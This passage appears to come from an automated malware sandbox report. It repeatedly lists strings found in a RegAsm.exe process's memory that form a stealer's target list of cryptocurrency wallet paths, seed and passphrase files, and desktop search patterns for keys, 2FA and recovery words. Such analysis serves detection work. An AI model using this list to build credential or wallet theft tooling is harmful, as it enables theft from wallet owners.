Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus Web3 Wallet
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: *,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local 